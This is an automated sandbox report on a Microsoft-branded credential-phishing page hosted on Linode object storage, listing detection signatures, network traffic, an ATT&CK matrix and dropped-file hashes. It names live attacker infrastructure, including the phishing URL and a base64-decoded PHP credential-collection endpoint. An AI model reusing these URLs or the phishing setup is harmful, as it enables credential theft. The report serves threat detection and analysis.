Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#

Overview

General Information

Sample URL:https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#
Analysis ID:1427677

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html# MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1944,i,14811865985261375929,17774316751324163722,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#Matcher: Template: microsoft matched with high similarity
    Source: Yara matchFile source: 0.1.pages.csv, type: HTML
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#Matcher: Found strong image similarity, brand: MICROSOFT
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: Number of links: 0
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: Total embedded image size: 31111
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: Base64 decoded: https://www.zibah.online/secured/host/84a43ea.php
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: Title: Sign in to Best Productivity Provider! does not match URL
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: Invalid link: Forgot my password
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: <input type="password" .../> found
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: No favicon
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: No <meta name="author".. found
    Source: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.17:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.17:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.17:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.157.11:443 -> 192.168.2.17:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.17:49742 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
    Source: unknownDNS traffic detected: queries for: mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.17:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.17:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.17:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.157.11:443 -> 192.168.2.17:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.17:49742 version: TLS 1.2
    Source: classification engineClassification label: mal60.phis.win@14/16@14/167
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1944,i,14811865985261375929,17774316751324163722,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1944,i,14811865985261375929,17774316751324163722,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    part-0013.t-0009.t-msedge.net
    13.107.246.41
    truefalse
      unknown
      code.jquery.com
      151.101.130.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.17.2.184
          truefalse
            high
            www.google.com
            64.233.176.99
            truefalse
              high
              www.zibah.online
              172.67.194.53
              truefalse
                unknown
                mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#true
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.17.24.14
                    cdnjs.cloudflare.comUnited States
                    13335CLOUDFLARENETUSfalse
                    13.107.246.41
                    part-0013.t-0009.t-msedge.netUnited States
                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    1.1.1.1
                    unknownAustralia
                    13335CLOUDFLARENETUSfalse
                    142.250.105.94
                    unknownUnited States
                    15169GOOGLEUSfalse
                    172.67.194.53
                    www.zibah.onlineUnited States
                    13335CLOUDFLARENETUSfalse
                    64.233.176.99
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    142.250.105.100
                    unknownUnited States
                    15169GOOGLEUSfalse
                    173.194.219.100
                    unknownUnited States
                    15169GOOGLEUSfalse
                    172.253.124.94
                    unknownUnited States
                    15169GOOGLEUSfalse
                    151.101.130.137
                    code.jquery.comUnited States
                    54113FASTLYUSfalse
                    173.194.219.84
                    unknownUnited States
                    15169GOOGLEUSfalse
                    239.255.255.250
                    unknownReserved
                    unknownunknownfalse
                    13.107.213.41
                    unknownUnited States
                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    194.195.215.215
                    unknownGermany
                    6659NEXINTO-DEfalse
                    104.17.2.184
                    challenges.cloudflare.comUnited States
                    13335CLOUDFLARENETUSfalse
                    IP
                    192.168.2.17
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1427677
                    Start date and time:2024-04-17 23:40:21 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                    Sample URL:https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:16
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    Analysis Mode:stream
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal60.phis.win@14/16@14/167
                    • Exclude process from analysis (whitelisted): SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 172.253.124.94, 173.194.219.100, 173.194.219.102, 173.194.219.138, 173.194.219.139, 173.194.219.101, 173.194.219.113, 173.194.219.84, 194.195.215.215, 139.177.204.133, 139.177.206.120, 194.195.215.57, 194.195.208.174, 194.195.213.250, 34.104.35.123
                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, us-southeast-1.linodeobjects.com.akadns.net, edgedl.me.gvt1.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, aadcdn.msauth.net, clients.l.google.com, firstparty-azurefd-prod.trafficmanager.net
                    • Not all processes where analyzed, report is missing behavior information
                    • VT rate limit hit for: https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html#
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 17 20:40:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):3.9948689201384493
                    Encrypted:false
                    SSDEEP:
                    MD5:16AECC689BF3F20E2D19B6A68ABDE983
                    SHA1:28A625C29F8C73BDEFF154127D251B1E94B215FE
                    SHA-256:79D89A897998C90DBD3B644EFC9C1BDFC7278027D2B0D1DD708E26151F505306
                    SHA-512:6C4075F026D05691D8C5818285F9731DEAE2365B1CDD759BD30C96537ED56601BD882DB1D6DDE902508D014DC55A8F1A837FD28C4366C5B9D64EE7AE32EC46C0
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....v5`.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 17 20:40:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2679
                    Entropy (8bit):4.01019588576169
                    Encrypted:false
                    SSDEEP:
                    MD5:80B3E8F29D13325FEB6B448C894F8331
                    SHA1:1A6F0A0080376163E0444DDE7448C1251AF1D5BF
                    SHA-256:B6AB98E4C2A66F25D1C245798044501AB2F68539707D713D2A99800D21D16B2E
                    SHA-512:CD219F39D69A321EE2D07C2DC59E6064DE5D95111637980678CEC770093FEA5BBCBE0F85A64EA8623E51EEC3708D7BD43027A028F8A3B925FF629E9CC053F2C6
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....<S.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2693
                    Entropy (8bit):4.017530251698026
                    Encrypted:false
                    SSDEEP:
                    MD5:BBF8C232AE9441E14AA2C6B6FD01D2B2
                    SHA1:F09620D6DB5352FC15A7DF3F40483472364E6D28
                    SHA-256:DB60B49D559871348614696F0E65CB620C139F867A625B6119DC4CFAC4A7E859
                    SHA-512:5DC08A4133E0BEEAD1719D7E45E90EE0A54038F0BB5CE1D9CAE668A616DD457C6C6378EA5209B9DE142D2A65D19FE455B440A70C75286C8667855A80F68715CE
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 17 20:40:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2681
                    Entropy (8bit):4.006914370829116
                    Encrypted:false
                    SSDEEP:
                    MD5:79FFFFEA46AB72EDEE5AF99AE776CD93
                    SHA1:83CB465ECE693C51D579E93BF797AE304AEB7FFE
                    SHA-256:59738844AD593BDD74C15733EA1315ED613B9D28C3819B389011A82506005C12
                    SHA-512:29BAD6F4034361B8379DF6B6957C8881FCA139FA4DBE65310464198C7E0601678E3424538174F610BE43AFB052E7ECF0CD1F0D07C5A70BD7A854F987A8711834
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....pM.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
